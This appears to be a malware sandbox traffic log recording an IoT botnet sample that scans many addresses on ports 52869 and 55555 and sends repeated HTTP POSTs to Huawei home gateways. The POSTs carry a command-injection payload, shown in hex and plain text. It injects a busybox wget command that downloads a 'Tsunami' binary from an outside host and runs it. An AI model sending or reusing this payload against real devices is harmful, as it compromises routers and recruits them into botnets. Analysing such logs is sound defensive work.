    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.58.44.172:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.95.254.138:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.92.83.162:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.5.195.231:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.198.82.134:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.38.26.244:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.61.238.8:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.113.193.103:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.35.41.76:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.227.190.91:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.111.110.234:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.198.77.98:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.25.194.206:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.134.122.52:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.255.197.74:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.205.19.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.108.52.158:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.242.138.35:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.0.221.152:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.84.132.198:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.55.215.207:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.1.146.122:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.220.149.209:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.134.36.237:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.236.205.137:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.230.150.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.100.134.43:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.139.88.49:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.131.232.139:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.251.156.199:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.24.82.33:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.101.178.132:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.151.61.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.182.38.76:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.165.191.167:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.250.7.184:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.51.220.73:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.236.213.241:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.253.232.165:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.236.77.241:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.246.40.23:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.135.31.236:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.221.211.125:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.1.90.182:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.187.172.13:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.203.88.174:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.16.131.215:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.173.188.62:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.149.38.139:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.35.1.99:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.144.99.110:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.133.24.85:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.157.143.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.51.34.162:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.14.186.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.135.77.219:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.208.122.171:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.39.181.172:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.145.164.220:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.114.93.124:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.8.100.162:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.96.232.255:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.230.40.143:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.156.165.111:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.230.179.98:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.88.88.226:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.153.35.48:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.153.253.81:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.34.47.104:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.152.66.186:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.222.66.166:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.161.145.108:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.168.64.29:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.202.52.244:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.215.94.93:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.54.154.12:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.247.100.134:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.246.0.157:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.82.228.255:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.69.37.205:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.193.227.233:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.92.54.144:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.177.209.154:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.66.30.13:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.141.111.20:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.42.71.163:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.60.176.255:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.68.88.174:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.203.186.8:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.65.253.183:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 156.107.158.71:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 197.186.250.145:52869
    Source: global trafficTCP traffic: 192.168.2.23:58943 -> 41.169.238.133:52869
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.48.127.213:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.228.144.29:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.130.13.76:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.168.144.235:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.98.175.33:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.53.225.232:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.61.4.52:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.66.36.172:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.0.155.55:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.26.82.245:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.65.200.41:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.74.226.195:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.168.240.214:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.86.243.164:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.50.11.241:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.121.52.227:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.130.58.21:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.94.20.59:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.153.46.147:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.136.102.39:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.49.162.235:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.198.251.36:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.42.22.16:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.120.234.66:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.160.190.202:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.56.80.143:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.140.149.86:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.210.147.81:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.233.224.70:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.241.104.129:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.50.137.233:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.22.180.33:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.143.101.54:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.159.214.236:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.57.68.99:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.192.187.192:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.88.53.137:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.127.15.148:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.89.32.237:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.102.237.79:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.245.116.41:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.104.103.252:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.208.178.98:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.8.252.102:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.237.164.238:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.247.192.26:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.227.65.69:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.110.68.252:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.169.63.140:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.46.92.22:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.162.182.123:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.17.223.227:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.87.37.229:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.227.9.197:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.79.3.190:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.48.104.75:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.48.116.153:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.100.115.220:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.249.161.226:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.234.47.109:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.35.155.135:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.115.63.215:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.41.154.138:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.77.114.136:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.63.124.76:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.47.8.251:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.86.152.251:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.33.27.240:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.123.223.216:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.87.254.141:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.104.119.51:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.9.196.59:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.252.242.236:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.65.247.168:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.188.163.149:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.52.216.21:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.71.222.74:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.222.162.179:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.96.44.104:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.186.225.145:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.124.68.60:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.48.25.63:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.186.83.18:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.85.53.30:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.129.95.60:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.10.99.98:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.89.197.83:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.33.166.92:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.85.13.126:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.155.207.75:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.73.185.2:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.230.192.74:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.76.36.224:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.88.9.30:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.168.178.209:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.56.35.239:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.173.145.147:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.10.147.125:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.118.74.217:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.122.234.100:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.113.120.171:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.31.175.45:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.143.73.233:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.144.239.165:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.11.82.12:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.43.7.206:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.67.197.94:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.209.45.183:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.12.11.230:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.175.214.161:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.79.40.189:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.180.122.246:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.67.202.95:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.143.21.81:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.226.190.68:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.148.233.218:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.188.62.199:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.8.48.147:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.112.159.128:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.208.113.69:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.51.23.42:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.126.117.235:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.82.57.163:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.218.102.99:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.87.247.251:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.35.209.237:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.186.224.129:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.228.221.54:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.17.55.118:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.213.179.74:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.211.80.156:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.216.35.220:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.110.112.238:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.0.188.128:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.152.243.169:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.60.115.47:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.193.119.51:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.108.99.5:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.218.169.58:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.202.23.239:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.157.182.200:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.217.125.109:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.170.33.233:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.243.12.216:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.14.224.0:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.197.182.129:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.55.122.227:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.100.61.160:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.243.198.203:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.172.251.220:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.151.147.25:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.209.208.139:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.225.112.182:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.129.78.168:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.229.144.101:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.146.67.222:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.33.148.30:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.209.88.44:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.73.205.214:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.92.251.43:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.50.142.39:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.200.214.153:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.139.247.86:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.240.17.55:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.60.168.50:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.3.170.224:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.167.40.34:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.177.1.22:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.240.181.129:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.182.20.79:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.142.40.43:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.204.156.38:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.151.163.204:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.46.93.199:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 184.167.249.98:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.91.119.60:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.96.241.95:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.124.46.207:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.169.69.67:55555
    Source: global trafficTCP traffic: 192.168.2.23:16186 -> 98.225.130.243:55555
    Source: /tmp/pjT3uuMrF1 (PID: 6230)Socket: 127.0.0.1::45837
    Source: /tmp/pjT3uuMrF1 (PID: 6248)Socket: 0.0.0.0::52869
    Source: /tmp/pjT3uuMrF1 (PID: 6248)Socket: 0.0.0.0::8080
    Source: /tmp/pjT3uuMrF1 (PID: 6248)Socket: 0.0.0.0::443
    Source: /tmp/pjT3uuMrF1 (PID: 6248)Socket: 0.0.0.0::37215
    Source: /tmp/pjT3uuMrF1 (PID: 6248)Socket: 0.0.0.0::23
    Source: /tmp/pjT3uuMrF1 (PID: 6248)Socket: 0.0.0.0::80
    Source: /tmp/pjT3uuMrF1 (PID: 6248)Socket: 0.0.0.0::0
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
